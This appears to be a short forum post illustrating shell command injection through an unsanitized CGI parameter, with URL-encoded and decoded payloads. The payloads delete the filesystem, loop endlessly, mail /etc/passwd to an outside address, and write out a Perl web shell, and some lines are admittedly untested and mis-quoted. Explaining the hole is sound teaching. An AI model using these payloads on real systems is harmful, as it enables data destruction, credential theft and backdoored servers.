bad.cgi?var%3Dtext%3B%60rm%20-rf%20%2F%60
or
bad.cgi?var%3Dtext%3Bwarn%20%27ha%27%20while%201
or
bad.cgi?var%3Dtext%3B%60mail%20%3C%20%2Fetc%2Fpasswd%20me%40isp.com%60
or
bad.cgi?var%3Dtext%3B%60echo%20%27%23%21%2Fusr%2Flocal%2Fbin%2Fperl%27
+%20%3E%20hack.cgi%60
bad.cgi?var%3Dtext%3B%60echo%20%27use%20CGI%20qw%2F%3Aall%2F%3B%27%20%
+3E%20hack.cgi%60
bad.cgi?var%3Dtext%3B%60echo%20%27%24cmd%20%3D%20param%28%22cmd%22%29%
+3B%27%20%3E%20hack.cgi%60
bad.cgi?var%3Dtext%3B%60echo%20%27print%20header%2Cstart_html%3B%20%3E
+%20hack.cgi%60
bad.cgi?var%3Dtext%3B%60echo%20%27print%20%5C%60%24cmd%5C%60%2C%20end_
+html%3B%20%3E%20hack.cgi%60
bad.cgi?var%3Dtext%3B%60chmod%20%2Bx%20hack.cgi%60
Which are the equivalents of:
bad.cgi?var=text;`rm -rf /`
or
bad.cgi?var=text;warn 'ha' while 1
or
bad.cgi?var=text;`mail < /etc/passwd me@isp.com`
or
bad.cgi?var=text;`echo '#!/usr/local/bin/perl' > hack.cgi`
bad.cgi?var=text;`echo 'use CGI qw/:all/;' > hack.cgi`
bad.cgi?var=text;`echo '$cmd = param("cmd");' > hack.cgi`
bad.cgi?var=text;`echo 'print header,start_html; > hack.cgi`
bad.cgi?var=text;`echo 'print \`$cmd\`, end_html; > hack.cgi`
bad.cgi?var=text;`chmod +x hack.cgi`
I have not tested this, though. :-)
--
Casey
I am a superhero.